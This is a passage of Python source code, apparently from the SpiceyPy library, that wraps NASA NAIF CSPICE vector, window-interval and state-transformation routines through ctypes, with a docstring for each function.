:param v1: ndim-dimensional double precision vector.
:type v1: list[ndim]
:param ndim: Dimension of vin (and also vout).
:type ndim: int
:return: ndim-dimensional double precision vector set equal to vin.
:rtype: list[ndim]
"""
v1 = stypes.toDoubleVector(v1)
vout = stypes.emptyDoubleVector(ndim)
ndim = ctypes.c_int(ndim)
libspice.vequg_c(v1, ndim, vout)
return stypes.cVectorToPython(vout)
@spiceErrorCheck
def vhat(v1):
"""
Find the unit vector along a double precision 3-dimensional vector.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vhat_c.html
:param v1: Vector to be unitized.
:type v1: 3-Element Array of floats
:return: Unit vector v / abs(v).
:rtype: 3-Element Array of floats
"""
v1 = stypes.toDoubleVector(v1)
vout = stypes.emptyDoubleVector(3)
libspice.vhat_c(v1, vout)
return stypes.cVectorToPython(vout)
@spiceErrorCheck
def vhatg(v1, ndim):
"""
Find the unit vector along a double precision vector of arbitrary dimension.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vhatg_c.html
:param v1: Vector to be normalized.
:type v1: list[ndim]
:param ndim: Dimension of v1 (and also vout).
:type ndim: int
:return: Unit vector v / abs(v).
:rtype: list[ndim]
"""
v1 = stypes.toDoubleVector(v1)
vout = stypes.emptyDoubleVector(ndim)
ndim = ctypes.c_int(ndim)
libspice.vhatg_c(v1, ndim, vout)
return stypes.cVectorToPython(vout)
@spiceErrorCheck
def vlcom(a, v1, b, v2):
"""
Compute a vector linear combination of two double precision,
3-dimensional vectors.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vlcom_c.html
:param a: Coefficient of v1
:type a: float
:param v1: Vector in 3-space
:type v1: 3-Element Array of floats
:param b: Coefficient of v2
:type b: float
:param v2: Vector in 3-space
:type v2: 3-Element Array of floats
:return: Linear Vector Combination a*v1 + b*v2.
:rtype: 3-Element Array of floats
"""
v1 = stypes.toDoubleVector(v1)
v2 = stypes.toDoubleVector(v2)
sumv = stypes.emptyDoubleVector(3)
a = ctypes.c_double(a)
b = ctypes.c_double(b)
libspice.vlcom_c(a, v1, b, v2, sumv)
return stypes.cVectorToPython(sumv)
@spiceErrorCheck
def vlcom3(a, v1, b, v2, c, v3):
"""
This subroutine computes the vector linear combination
a*v1 + b*v2 + c*v3 of double precision, 3-dimensional vectors.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vlcom3_c.html
:param a: Coefficient of v1
:type a: float
:param v1: Vector in 3-space
:type v1: 3-Element Array of floats
:param b: Coefficient of v2
:type b: float
:param v2: Vector in 3-space
:type v2: 3-Element Array of floats
:param c: Coefficient of v3
:type c: float
:param v3: Vector in 3-space
:type v3: 3-Element Array of floats
:return: Linear Vector Combination a*v1 + b*v2 + c*v3
:rtype: 3-Element Array of floats
"""
v1 = stypes.toDoubleVector(v1)
v2 = stypes.toDoubleVector(v2)
v3 = stypes.toDoubleVector(v3)
sumv = stypes.emptyDoubleVector(3)
a = ctypes.c_double(a)
b = ctypes.c_double(b)
c = ctypes.c_double(c)
libspice.vlcom3_c(a, v1, b, v2, c, v3, sumv)
return stypes.cVectorToPython(sumv)
@spiceErrorCheck
def vlcomg(n, a, v1, b, v2):
"""
Compute a vector linear combination of two double precision
vectors of arbitrary dimension.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vlcomg_c.html
:param n: Dimension of vector space
:type n: int
:param a: Coefficient of v1
:type a: float
:param v1: Vector in n-space
:type v1: list[n]
:param b: Coefficient of v2
:type b: float
:param v2: Vector in n-space
:type v2: list[n]
:return: Linear Vector Combination a*v1 + b*v2
:rtype: list[n]
"""
v1 = stypes.toDoubleVector(v1)
v2 = stypes.toDoubleVector(v2)
sumv = stypes.emptyDoubleVector(n)
a = ctypes.c_double(a)
b = ctypes.c_double(b)
n = ctypes.c_int(n)
libspice.vlcomg_c(n, a, v1, b, v2, sumv)
return stypes.cVectorToPython(sumv)
@spiceErrorCheck
def vminug(vin, ndim):
"""
Negate a double precision vector of arbitrary dimension.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vminug_c.html
:param vin: ndim-dimensional double precision vector to be negated.
:type vin: Array of floats
:param ndim: Dimension of vin.
:type ndim: int
:return: ndim-dimensional double precision vector equal to -vin.
:rtype: list[ndim]
"""
vin = stypes.toDoubleVector(vin)
vout = stypes.emptyDoubleVector(ndim)
ndim = ctypes.c_int(ndim)
libspice.vminug_c(vin, ndim, vout)
return stypes.cVectorToPython(vout)
@spiceErrorCheck
def vminus(vin):
"""
Negate a double precision 3-dimensional vector.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vminus_c.html
:param vin: Vector to be negated.
:type vin: 3-Element Array of floats
:return: Negated vector -v1.
:rtype: 3-Element Array of floats
"""
vin = stypes.toDoubleVector(vin)
vout = stypes.emptyDoubleVector(3)
libspice.vminus_c(vin, vout)
return stypes.cVectorToPython(vout)
@spiceErrorCheck
def vnorm(v):
"""
Compute the magnitude of a double precision, 3-dimensional vector.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vnorm_c.html
:param v: Vector whose magnitude is to be found.
:type v: 3-Element Array of floats
:return: magnitude of v calculated in a numerically stable way
:rtype: float
"""
v = stypes.toDoubleVector(v)
return libspice.vnorm_c(v)
@spiceErrorCheck
def vnormg(v, ndim):
"""
Compute the magnitude of a double precision vector of arbitrary dimension.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vnormg_c.html
:param v: Vector whose magnitude is to be found.
:type v: Array of floats
:param ndim: Dimension of v
:type ndim: int
:return: magnitude of v calculated in a numerically stable way
:rtype: float
"""
v = stypes.toDoubleVector(v)
ndim = ctypes.c_int(ndim)
return libspice.vnormg_c(v, ndim)
@spiceErrorCheck
def vpack(x, y, z):
"""
Pack three scalar components into a vector.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vpack_c.html
:param x: first scalar component
:type x: float
:param y: second scalar component
:type y: float
:param z: third scalar component
:type z: float
:return: Equivalent 3-vector.
:rtype: 3-Element Array of floats
"""
x = ctypes.c_double(x)
y = ctypes.c_double(y)
z = ctypes.c_double(z)
vout = stypes.emptyDoubleVector(3)
libspice.vpack_c(x, y, z, vout)
return stypes.cVectorToPython(vout)
@spiceErrorCheck
def vperp(a, b):
"""
Find the component of a vector that is perpendicular to a second
vector. All vectors are 3-dimensional.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vperp_c.html
:param a: The vector whose orthogonal component is sought.
:type a: 3-Element Array of floats
:param b: The vector used as the orthogonal reference.
:type b: 3-Element Array of floats
:return: The component of a orthogonal to b.
:rtype: 3-Element Array of floats
"""
a = stypes.toDoubleVector(a)
b = stypes.toDoubleVector(b)
vout = stypes.emptyDoubleVector(3)
libspice.vperp_c(a, b, vout)
return stypes.cVectorToPython(vout)
@spiceErrorCheck
def vprjp(vin, plane):
"""
Project a vector onto a specified plane, orthogonally.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vprjp_c.html
:param vin: The projected vector.
:type vin: 3-Element Array of floats
:param plane: Plane containing vin.
:type plane: spiceypy.utils.support_types.Plane
:return: Vector resulting from projection.
:rtype: 3-Element Array of floats
"""
vin = stypes.toDoubleVector(vin)
vout = stypes.emptyDoubleVector(3)
libspice.vprjp_c(vin, ctypes.byref(plane), vout)
return stypes.cVectorToPython(vout)
@spiceErrorCheck
@spiceFoundExceptionThrower
def vprjpi(vin, projpl, invpl):
"""
Find the vector in a specified plane that maps to a specified
vector in another plane under orthogonal projection.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vprjpi_c.html
:param vin: The projected vector.
:type vin: 3-Element Array of floats
:param projpl: Plane containing vin.
:type projpl: spiceypy.utils.support_types.Plane
:param invpl: Plane containing inverse image of vin.
:type invpl: spiceypy.utils.support_types.Plane
:return: Inverse projection of vin.
:rtype: list
"""
vin = stypes.toDoubleVector(vin)
vout = stypes.emptyDoubleVector(3)
found = ctypes.c_int()
libspice.vprjpi_c(vin, ctypes.byref(projpl), ctypes.byref(invpl), vout,
ctypes.byref(found))
return stypes.cVectorToPython(vout), bool(found.value)
@spiceErrorCheck
def vproj(a, b):
"""
Find the projection of one vector onto another vector.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vproj_c.html
:param a: The vector to be projected.
:type a: 3-Element Array of floats
:param b: The vector onto which a is to be projected.
:type b: 3-Element Array of floats
:return: The projection of a onto b.
:rtype: 3-Element Array of floats
"""
a = stypes.toDoubleVector(a)
b = stypes.toDoubleVector(b)
vout = stypes.emptyDoubleVector(3)
libspice.vproj_c(a, b, vout)
return stypes.cVectorToPython(vout)
@spiceErrorCheck
def vrel(v1, v2):
"""
Return the relative difference between two 3-dimensional vectors.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vrel_c.html
:param v1: First vector
:type v1: 3-Element Array of floats
:param v2: Second vector
:type v2: 3-Element Array of floats
:return: the relative difference between v1 and v2.
:rtype: float
"""
v1 = stypes.toDoubleVector(v1)
v2 = stypes.toDoubleVector(v2)
return libspice.vrel_c(v1, v2)
@spiceErrorCheck
def vrelg(v1, v2, ndim):
"""
Return the relative difference between two vectors of general dimension.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vrelg_c.html
:param v1: First vector
:type v1: Array of floats
:param v2: Second vector
:type v2: Array of floats
:param ndim: Dimension of v1 and v2.
:type ndim: int
:return: the relative difference between v1 and v2.
:rtype: float
"""
v1 = stypes.toDoubleVector(v1)
v2 = stypes.toDoubleVector(v2)
ndim = ctypes.c_int(ndim)
return libspice.vrelg_c(v1, v2, ndim)
@spiceErrorCheck
def vrotv(v, axis, theta):
"""
Rotate a vector about a specified axis vector by a
specified angle and return the rotated vector.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vrotv_c.html
:param v: Vector to be rotated.
:type v: 3-Element Array of floats
:param axis: Axis of the rotation.
:type axis: 3-Element Array of floats
:param theta: Angle of rotation (radians).
:type theta: float
:return: Result of rotating v about axis by theta
:rtype: 3-Element Array of floats
"""
v = stypes.toDoubleVector(v)
axis = stypes.toDoubleVector(axis)
theta = ctypes.c_double(theta)
r = stypes.emptyDoubleVector(3)
libspice.vrotv_c(v, axis, theta, r)
return stypes.cVectorToPython(r)
@spiceErrorCheck
def vscl(s, v1):
"""
Multiply a scalar and a 3-dimensional double precision vector.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vscl_c.html
:param s: Scalar to multiply a vector
:type s: float
:param v1: Vector to be multiplied
:type v1: 3-Element Array of floats
:return: Product vector, s*v1.
:rtype: 3-Element Array of floats
"""
s = ctypes.c_double(s)
v1 = stypes.toDoubleVector(v1)
vout = stypes.emptyDoubleVector(3)
libspice.vscl_c(s, v1, vout)
return stypes.cVectorToPython(vout)
@spiceErrorCheck
def vsclg(s, v1, ndim):
"""
Multiply a scalar and a double precision vector of arbitrary dimension.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vsclg_c.html
:param s: Scalar to multiply a vector
:type s: float
:param v1: Vector to be multiplied
:type v1: Array of floats
:param ndim: Dimension of v1
:type ndim: int
:return: Product vector, s*v1.
:rtype: Array of floats
"""
s = ctypes.c_double(s)
v1 = stypes.toDoubleVector(v1)
vout = stypes.emptyDoubleVector(ndim)
ndim = ctypes.c_int(ndim)
libspice.vsclg_c(s, v1, ndim, vout)
return stypes.cVectorToPython(vout)
@spiceErrorCheck
def vsep(v1, v2):
"""
Find the separation angle in radians between two double
precision, 3-dimensional vectors. This angle is defined as zero
if either vector is zero.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vsep_c.html
:param v1: First vector
:type v1: 3-Element Array of floats
:param v2: Second vector
:type v2: 3-Element Array of floats
:return: separation angle in radians
:rtype: float
"""
v1 = stypes.toDoubleVector(v1)
v2 = stypes.toDoubleVector(v2)
return libspice.vsep_c(v1, v2)
@spiceErrorCheck
def vsepg(v1, v2, ndim):
"""
Find the separation angle in radians between two double
precision vectors of arbitrary dimension. This angle is defined
as zero if either vector is zero.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vsepg_c.html
:param v1: First vector
:type v1: Array of floats
:param v2: Second vector
:type v2: Array of floats
:param ndim: The number of elements in v1 and v2.
:type ndim: int
:return: separation angle in radians
:rtype: float
"""
v1 = stypes.toDoubleVector(v1)
v2 = stypes.toDoubleVector(v2)
ndim = ctypes.c_int(ndim)
return libspice.vsepg_c(v1, v2, ndim)
@spiceErrorCheck
def vsub(v1, v2):
"""
Compute the difference between two 3-dimensional,
double precision vectors.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vsub_c.html
:param v1: First vector (minuend).
:type v1: 3-Element Array of floats
:param v2: Second vector (subtrahend).
:type v2: 3-Element Array of floats
:return: Difference vector, v1 - v2.
:rtype: 3-Element Array of floats
"""
v1 = stypes.toDoubleVector(v1)
v2 = stypes.toDoubleVector(v2)
vout = stypes.emptyDoubleVector(3)
libspice.vsub_c(v1, v2, vout)
return stypes.cVectorToPython(vout)
@spiceErrorCheck
def vsubg(v1, v2, ndim):
"""
Compute the difference between two double precision
vectors of arbitrary dimension.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vsubg_c.html
:param v1: First vector (minuend).
:type v1: Array of floats
:param v2: Second vector (subtrahend).
:type v2: Array of floats
:param ndim: Dimension of v1, v2, and vout.
:type ndim: int
:return: Difference vector, v1 - v2.
:rtype: Array of floats
"""
v1 = stypes.toDoubleVector(v1)
v2 = stypes.toDoubleVector(v2)
vout = stypes.emptyDoubleVector(ndim)
ndim = ctypes.c_int(ndim)
libspice.vsubg_c(v1, v2, ndim, vout)
return stypes.cVectorToPython(vout)
@spiceErrorCheck
def vtmv(v1, matrix, v2):
"""
Multiply the transpose of a 3-dimensional column vector
a 3x3 matrix, and a 3-dimensional column vector.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vtmv_c.html
:param v1: 3 dimensional double precision column vector.
:type v1: 3-Element Array of floats
:param matrix: 3x3 double precision matrix.
:type matrix: 3x3-Element Array of floats
:param v2: 3 dimensional double precision column vector.
:type v2: 3-Element Array of floats
:return: the result of (v1**t * matrix * v2 ).
:rtype: float
"""
v1 = stypes.toDoubleVector(v1)
matrix = stypes.toDoubleMatrix(matrix)
v2 = stypes.toDoubleVector(v2)
return libspice.vtmv_c(v1, matrix, v2)
@spiceErrorCheck
def vtmvg(v1, matrix, v2, nrow, ncol):
"""
Multiply the transpose of a n-dimensional
column vector a nxm matrix,
and a m-dimensional column vector.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vtmvg_c.html
:param v1: n-dimensional double precision column vector.
:type v1: Array of floats
:param matrix: nxm double precision matrix.
:type matrix: NxM-Element Array of floats
:param v2: m-dimensional double porecision column vector.
:type v2: Array of floats
:param nrow: Number of rows in matrix (number of rows in v1.)
:type nrow: int
:param ncol: Number of columns in matrix (number of rows in v2.)
:type ncol: int
:return: the result of (v1**t * matrix * v2 )
:rtype: float
"""
v1 = stypes.toDoubleVector(v1)
matrix = stypes.toDoubleMatrix(matrix)
v2 = stypes.toDoubleVector(v2)
nrow = ctypes.c_int(nrow)
ncol = ctypes.c_int(ncol)
return libspice.vtmvg_c(v1, matrix, v2, nrow, ncol)
@spiceErrorCheck
def vupack(v):
"""
Unpack three scalar components from a vector.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vupack_c.html
:param v: Vector
:type v: 3-Element Array of floats
:return: (x, y, z)
:rtype: tuple
"""
v1 = stypes.toDoubleVector(v)
x = ctypes.c_double()
y = ctypes.c_double()
z = ctypes.c_double()
libspice.vupack_c(v1, ctypes.byref(x), ctypes.byref(y), ctypes.byref(z))
return x.value, y.value, z.value
@spiceErrorCheck
def vzero(v):
"""
Indicate whether a 3-vector is the zero vector.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vzero_c.html
:param v: Vector to be tested
:type v: 3-Element Array of floats
:return: true if and only if v is the zero vector
:rtype: bool
"""
v = stypes.toDoubleVector(v)
return bool(libspice.vzero_c(v))
@spiceErrorCheck
def vzerog(v, ndim):
"""
Indicate whether a general-dimensional vector is the zero vector.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vzerog_c.html
:param v: Vector to be tested
:type v: Array of floats
:param ndim: Dimension of v
:type ndim: int
:return: true if and only if v is the zero vector
:rtype: bool
"""
v = stypes.toDoubleVector(v)
ndim = ctypes.c_int(ndim)
return bool(libspice.vzerog_c(v, ndim))
################################################################################
# W
@spiceErrorCheck
def wncard(window):
"""
Return the cardinality (number of intervals) of a double
precision window.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/wncard_c.html
:param window: Input window
:type window: spiceypy.utils.support_types.SpiceCell
:return: the cardinality of the input window.
:rtype: int
"""
assert isinstance(window, stypes.SpiceCell)
return libspice.wncard_c(window)
@spiceErrorCheck
def wncomd(left, right, window):
"""
Determine the complement of a double precision window with
respect to a specified interval.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/wncomd_c.html
:param left: left endpoints of complement interval.
:type left: float
:param right: right endpoints of complement interval.
:type right: float
:param window: Input window
:type window: spiceypy.utils.support_types.SpiceCell
:return: Complement of window with respect to left and right.
:rtype: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(window, stypes.SpiceCell)
assert window.dtype == 1
left = ctypes.c_double(left)
right = ctypes.c_double(right)
result = stypes.SpiceCell.double(window.size)
libspice.wncomd_c(left, right, ctypes.byref(window), result)
return result
@spiceErrorCheck
def wncond(left, right, window):
"""
Contract each of the intervals of a double precision window.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/wncond_c.html
:param left: Amount added to each left endpoint.
:type left: float
:param right: Amount subtracted from each right endpoint.
:type right: float
:param window: Window to be contracted
:type window: spiceypy.utils.support_types.SpiceCell
:return: Contracted Window.
:rtype: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(window, stypes.SpiceCell)
assert window.dtype == 1
left = ctypes.c_double(left)
right = ctypes.c_double(right)
libspice.wncond_c(left, right, ctypes.byref(window))
return window
@spiceErrorCheck
def wndifd(a, b):
"""
Place the difference of two double precision windows into
a third window.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/wndifd_c.html
:param a: Input window A.
:type a: spiceypy.utils.support_types.SpiceCell
:param b: Input window B.
:type b: spiceypy.utils.support_types.SpiceCell
:return: Difference of a and b.
:rtype: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(a, stypes.SpiceCell)
assert isinstance(b, stypes.SpiceCell)
assert a.dtype == 1
assert b.dtype == 1
c = stypes.SpiceCell.double(a.size + b.size)
libspice.wndifd_c(ctypes.byref(a), ctypes.byref(b), ctypes.byref(c))
return c
@spiceErrorCheck
def wnelmd(point, window):
"""
Determine whether a point is an element of a double precision
window.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/wnelmd_c.html
:param point: Input point.
:type point: float
:param window: Input window
:type window: spiceypy.utils.support_types.SpiceCell
:return: returns True if point is an element of window.
:rtype: bool
"""
assert isinstance(window, stypes.SpiceCell)
assert window.dtype == 1
point = ctypes.c_double(point)
return bool(libspice.wnelmd_c(point, ctypes.byref(window)))
@spiceErrorCheck
def wnexpd(left, right, window):
"""
Expand each of the intervals of a double precision window.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/wnexpd_c.html
:param left: Amount subtracted from each left endpoint.
:type left: float
:param right: Amount added to each right endpoint.
:type right: float
:param window: Window to be expanded.
:type window: spiceypy.utils.support_types.SpiceCell
:return: Expanded Window.
:rtype: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(window, stypes.SpiceCell)
assert window.dtype == 1
left = ctypes.c_double(left)
right = ctypes.c_double(right)
libspice.wnexpd_c(left, right, ctypes.byref(window))
return window
@spiceErrorCheck
def wnextd(side, window):
"""
Extract the left or right endpoints from a double precision
window.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/wnextd_c.html
:param side: Extract left "L" or right "R" endpoints.
:type side: str
:param window: Window to be extracted.
:type window: spiceypy.utils.support_types.SpiceCell
:return: Extracted Window.
:rtype: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(window, stypes.SpiceCell)
assert window.dtype == 1
assert side == 'L' or side == 'R'
side = ctypes.c_char(side.encode(encoding='UTF-8'))
libspice.wnextd_c(side, ctypes.byref(window))
return window
@spiceErrorCheck
def wnfetd(window, n):
"""
Fetch a particular interval from a double precision window.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/wnfetd_c.html
:param window: Input window
:type window: spiceypy.utils.support_types.SpiceCell
:param n: Index of interval to be fetched.
:type n: int
:return: Left, right endpoints of the nth interval.
:rtype: tuple
"""
assert isinstance(window, stypes.SpiceCell)
assert window.dtype == 1
n = ctypes.c_int(n)
left = ctypes.c_double()
right = ctypes.c_double()
libspice.wnfetd_c(ctypes.byref(window), n, ctypes.byref(left),
ctypes.byref(right))
return left.value, right.value
@spiceErrorCheck
def wnfild(small, window):
"""
Fill small gaps between adjacent intervals of a double precision window.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/wnfild_c.html
:param small: Limiting measure of small gaps.
:type small: float
:param window: Window to be filled
:type window: spiceypy.utils.support_types.SpiceCell
:return: Filled Window.
:rtype: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(window, stypes.SpiceCell)
assert window.dtype == 1
small = ctypes.c_double(small)
libspice.wnfild_c(small, ctypes.byref(window))
return window
@spiceErrorCheck
def wnfltd(small, window):
"""
Filter (remove) small intervals from a double precision window.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/wnfltd_c.html
:param small: Limiting measure of small intervals.
:type small: float
:param window: Window to be filtered.
:type window: spiceypy.utils.support_types.SpiceCell
:return: Filtered Window.
:rtype: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(window, stypes.SpiceCell)
assert window.dtype == 1
small = ctypes.c_double(small)
libspice.wnfltd_c(small, ctypes.byref(window))
return window
@spiceErrorCheck
def wnincd(left, right, window):
"""
Determine whether an interval is included in a double precision window.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/wnincd_c.html
:param left: Left interval
:type left: float
:param right: Right interval
:type right: float
:param window: Input window
:type window: spiceypy.utils.support_types.SpiceCell
:return: Returns True if the input interval is included in window.
:rtype: bool
"""
assert isinstance(window, stypes.SpiceCell)
assert window.dtype == 1
left = ctypes.c_double(left)
right = ctypes.c_double(right)
return bool(libspice.wnincd_c(left, right, ctypes.byref(window)))
@spiceErrorCheck
def wninsd(left, right, window):
"""
Insert an interval into a double precision window.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/wninsd_c.html
:param left: Left endpoints of new interval.
:type left: float
:param right: Right endpoints of new interval.
:type right: float
:param window: Input window.
:type window: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(window, stypes.SpiceCell)
assert window.dtype == 1
left = ctypes.c_double(left)
right = ctypes.c_double(right)
libspice.wninsd_c(left, right, ctypes.byref(window))
@spiceErrorCheck
def wnintd(a, b):
"""
Place the intersection of two double precision windows into
a third window.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/wnintd_c.html
:param a: Input window A.
:type a: spiceypy.utils.support_types.SpiceCell
:param b: Input window B.
:type b: spiceypy.utils.support_types.SpiceCell
:return: Intersection of a and b.
:rtype: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(a, stypes.SpiceCell)
assert b.dtype == 1
assert isinstance(b, stypes.SpiceCell)
assert a.dtype == 1
c = stypes.SpiceCell.double(b.size + a.size)
libspice.wnintd_c(ctypes.byref(a), ctypes.byref(b), ctypes.byref(c))
return c
@spiceErrorCheck
def wnreld(a, op, b):
"""
Compare two double precision windows.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/wnreld_c.html
:param a: First window.
:type a: spiceypy.utils.support_types.SpiceCell
:param op: Comparison operator.
:type op: str
:param b: Second window.
:type b: spiceypy.utils.support_types.SpiceCell
:return: The result of comparison: a (op) b.
:rtype: bool
"""
assert isinstance(a, stypes.SpiceCell)
assert b.dtype == 1
assert isinstance(b, stypes.SpiceCell)
assert a.dtype == 1
assert isinstance(op, str)
op = stypes.stringToCharP(op.encode(encoding='UTF-8'))
return bool(libspice.wnreld_c(ctypes.byref(a), op, ctypes.byref(b)))
@spiceErrorCheck
def wnsumd(window):
"""
Summarize the contents of a double precision window.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/wnsumd_c.html
:param window: Window to be summarized.
:type window: spiceypy.utils.support_types.SpiceCell
:return:
Total measure of intervals in window,
Average measure, Standard deviation,
Location of shortest interval,
Location of longest interval.
:rtype: tuple
"""
assert isinstance(window, stypes.SpiceCell)
assert window.dtype == 1
meas = ctypes.c_double()
avg = ctypes.c_double()
stddev = ctypes.c_double()
shortest = ctypes.c_int()
longest = ctypes.c_int()
libspice.wnsumd_c(ctypes.byref(window), ctypes.byref(meas),
ctypes.byref(avg), ctypes.byref(stddev),
ctypes.byref(shortest), ctypes.byref(longest))
return meas.value, avg.value, stddev.value, shortest.value, longest.value
@spiceErrorCheck
def wnunid(a, b):
"""
Place the union of two double precision windows into a third window.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/wnunid_c.html
:param a: Input window A.
:type a: spiceypy.utils.support_types.SpiceCell
:param b: Input window B.
:type b: spiceypy.utils.support_types.SpiceCell
:return: Union of a and b.
:rtype: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(a, stypes.SpiceCell)
assert b.dtype == 1
assert isinstance(b, stypes.SpiceCell)
assert a.dtype == 1
c = stypes.SpiceCell.double(b.size + a.size)
libspice.wnunid_c(ctypes.byref(a), ctypes.byref(b), ctypes.byref(c))
return c
@spiceErrorCheck
def wnvald(insize, n, window):
"""
Form a valid double precision window from the contents
of a window array.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/wnvald_c.html
:param insize: Size of window.
:type insize: int
:param n: Original number of endpoints.
:type n: int
:param window: Input window.
:type window: spiceypy.utils.support_types.SpiceCell
:return: The union of the intervals in the input cell.
:rtype: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(window, stypes.SpiceCell)
assert window.dtype == 1
insize = ctypes.c_int(insize)
n = ctypes.c_int(n)
libspice.wnvald_c(insize, n, ctypes.byref(window))
return window
@spiceErrorCheck
def writln(line, unit):
"""
Internal undocumented command for writing a text line to a logical unit
No URL available; relevant lines from SPICE source:
FORTRAN SPICE, writln.f::
C$Procedure WRITLN ( Write a text line to a logical unit )
SUBROUTINE WRITLN ( LINE, UNIT )
CHARACTER*(*) LINE
INTEGER UNIT
C Variable I/O Description
C -------- --- --------------------------------------------------
C LINE I The line which is to be written to UNIT.
C UNIT I The Fortran unit number to use for output.
CSPICE, writln.c::
/* $Procedure WRITLN ( Write a text line to a logical unit ) */
/* Subroutine */ int writln_(char *line, integer *unit, ftnlen line_len)
:param line: The line which is to be written to UNIT.
:type line: str
:param unit: The Fortran unit number to use for output.
:type unit: int
"""
lineP = stypes.stringToCharP(line)
unit = ctypes.c_int(unit)
line_len = ctypes.c_int(len(line))
libspice.writln_(lineP, ctypes.byref(unit), line_len)
################################################################################
# X
@spiceErrorCheck
def xf2eul(xform, axisa, axisb, axisc):
"""
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/xf2eul_c.html
:param xform: state transformation matrix
:type xform: list[6][6]
:param axisa: Axis A of the Euler angle factorization.
:type axisa: int
:param axisb: Axis B of the Euler angle factorization.
:type axisb: int
:param axisc: Axis C of the Euler angle factorization.
:type axisc: int
:return: (eulang, unique)
:rtype: tuple
"""
xform = stypes.toDoubleMatrix(xform)
axisa = ctypes.c_int(axisa)
axisb = ctypes.c_int(axisb)
axisc = ctypes.c_int(axisc)
eulang = stypes.emptyDoubleVector(6)
unique = ctypes.c_int()
libspice.xf2eul_c(xform, axisa, axisb, axisc, eulang, unique)
return stypes.cVectorToPython(eulang), unique.value
@spiceErrorCheck
def xf2rav(xform):
"""
This routine determines the rotation matrix and angular velocity
of the rotation from a state transformation matrix.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/xf2rav_c.html
:param xform: state transformation matrix
:type xform: list[6][6]
:return:
rotation associated with xform,
angular velocity associated with xform.
:rtype: tuple
"""
xform = stypes.toDoubleMatrix(xform)
rot = stypes.emptyDoubleMatrix()
av = stypes.emptyDoubleVector(3)
libspice.xf2rav_c(xform, rot, av)
return stypes.cMatrixToNumpy(rot), stypes.cVectorToPython(av)
@spiceErrorCheck
def xfmsta(input_state, input_coord_sys, output_coord_sys, body):
"""
Transform a state between coordinate systems.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/xfmsta_c.html
:param input_state: Input state.
:type input_state: 6-Element Array of floats
:param input_coord_sys: Current (input) coordinate system.
:type input_coord_sys: str
:param output_coord_sys: Desired (output) coordinate system.
:type output_coord_sys: str
:param body:
Name or NAIF ID of body with which coordinates
are associated (if applicable).
:type body: str
:return: Converted output state
:rtype: 6-Element Array of floats
"""
input_state = stypes.toDoubleVector(input_state)
input_coord_sys = stypes.stringToCharP(input_coord_sys)
output_coord_sys = stypes.stringToCharP(output_coord_sys)
body = stypes.stringToCharP(body)
output_state = stypes.emptyDoubleVector(6)
libspice.xfmsta_c(input_state, input_coord_sys, output_coord_sys, body,
output_state)
